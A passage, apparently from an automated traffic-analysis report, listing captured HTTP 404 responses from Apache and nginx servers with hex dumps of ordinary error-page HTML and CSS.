67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:47 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:50 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Aug 2024 16:28:52 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 26 Aug 2024 16:29:13 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 26 Aug 2024 16:29:15 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 26 Aug 2024 16:29:18 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
